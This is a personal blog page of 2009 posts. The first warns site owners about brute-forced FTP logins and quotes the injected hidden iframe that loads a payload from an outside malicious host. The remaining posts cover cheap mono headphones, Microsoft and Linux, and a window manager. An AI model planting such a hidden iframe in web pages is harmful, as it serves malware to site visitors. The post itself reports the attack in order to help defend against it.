Brute Force FTP Password Hacking On The Rise
September 15, 2009 by Marko · Leave a Comment
I know of at least six websites that I provide support for that have had malicious code embedded into their web pages in the last few months. The common entry point for the hackers in all of these cases has been FTP login. Each site had simple username/password combinations and hence were fairly easy to get into. It seems that the hackers are using an automated script to insert their code as I’ve found that every single file with the filename containing the words “index” or “default” gets modified, regardless of the extension (whether .htm, .html, .php, .asp, etc…) and whether it’s a file that is actually even linked to or not.
Commonly, an invisible iframe like the following gets inserted after the <body> tag or then at the very end of the file.
<iframe src=”http://3e0.ru:8080/index.php” width=160 height=188 style=”visibility: hidden”></iframe>
The file on the remote site then delivers the real payload. Sometimes javascript code is inserted instead of an iframe. Again, the javascript code loads an external javascript file which contains the real payload.
If your clients haven’t made recent backups you will need to either manually remove the offending code snippets or then create a script to do it for you (if many files are affected). If you leave the code in place or don’t remove it quickly enough, the site will end up getting on Googles black list. Browsers like Firefox will then not show the site and instead put up a big red warning page. IE will continue to show the hacked pages and is probably the target of the malicious code in the first place. If your site does get black listed you will need to go request a re-scan from Google.
The easiest way to avoid this hack is just to make sure all your (and your clients) passwords are not overly simple. The password “password” is not a good choice while “fuMrHack8″ is.
Mono “Hi-fi” Wireless Headphones
September 14, 2009 by Marko · Leave a Comment
This past weekend I was searching for wireless headphones to replace the ones I use at work that are worn out. I remember getting my current ones from some grocery store for about $25 (about 5 years ago?) and was hoping to find something similar. Would like them small, lightweight and comfortable enough for wearing hours at a time during work. I checked a cheap local store, XSCARGO, and was surprised to find some for only $10. The box said had “Hi-Fi”, “Super Bass” and even included an FM radio reciever built-in. Good deal, I thought… until I got them home and tested them. Even though the 3.5mm cabling that came with it had the obvious 3 sections, meaning that it’s stereo, the headphones themselves ended up only being mono. Same for the FM radio. I had another look at the packaging and sure enough the word “Stereo” does NOT appear anywhere on it. And I guess they can still call them “Hi-Fi” because that is a hazy term anyway. I went to 2 other cheap stores, Factory Direct and KW Surplus, and found different no-name chinese-manufactured wireless headphones in the $10 range that indicated “Hi-Fi” but not “Stereo”. So, I have come to the conclusion that the makers of bulk crap electronics have realized that most people (at least the ones in the market for cheap headphones) can’t tell the difference between what stereo and mono sounds like when played in both ears. The cheapest ones I have found to date that are both wireless and stereo (I think) are at Walmart for $30 but they are huge. Canadian Tire and The Source (RadioShack) has them starting at $80. BestBuys cheapest pair was $120. Ebay is full of the cheap mono headphones and no real deals to be found on proper ones. I will keep looking.
Microsoft Hit List
September 13, 2009 by Marko · Leave a Comment
Microsoft’s latest checklist
Date: 2007-06-14 (transfered from old blog)
I’ve been using Linux on my main desktop computer for many years now and find the recent deals Microsoft is making with major Linux distributions to be very troubling. I use ArchLinux, which is surely not even on Microsoft’s radar, but still, anything that happens to the more popular Linux distros can hurt us all.
Microsoft’s checklist…
[x] SuSE (failing, easy target)
[x] Xandros (failing, easy target)
[x] Linspire/Freespire (failing, easy target)
[ ] Mandriva (failing, easy target)
[ ] Redhat/Fedora (they have money, might be a hard one to crack, concentrate on patent lawsuits)
[ ] Ubuntu/Kubuntu/Xubuntu (they have community, might be a hard one to crack, concentrate on patent lawsuits)
[ ] Slackware (who cares, only hardcore nerds use this, ignore for now)
[ ] Gentoo (who cares, only hardcore nerds use this, ignore for now)
[ ] Debian (they have militant community, might be impossible to crack, ignore for now)
For more information, check out these Slashdot articles…
Linspire Signs Patent Pact With MS
Windows In A Linux World
September 13, 2009 by Marko · Leave a Comment
Windows In A Linux World
Date: 2005-04-04 (transfered from old blog)
I went to our local Linux User Group meeting tonight and the guest speaker was a Microsoft representative talking about Unix Services on Windows. Basically, Microsoft is pretending that they are involved in the open-source movement by making tools that allow you run Linux virtual machines under Windows and allowing a select few corporations have a peek at some of their source code… but everything was restricted and geared toward having Windows control it all. Everything is made with the sense that the user will want to migrate completely to Windows eventually. He handed out 10 free copies of Windows 2003 Server. “Hey kid, first one’s free!” (thanks, but no thanks)
IceWM
September 13, 2009 by Marko · Leave a Comment
IceWM screenshots
Date: 2005-01-02 (transfered from old blog)
I have been using Linux on my main desktop computer for 4 years now. Seen here running with the IceWM window manager. I recently switched from Mandrake Linux to Arch Linux and thought I’d put up a newer screenshot. Click the image to get the full-size version. Click here for an older screenshot
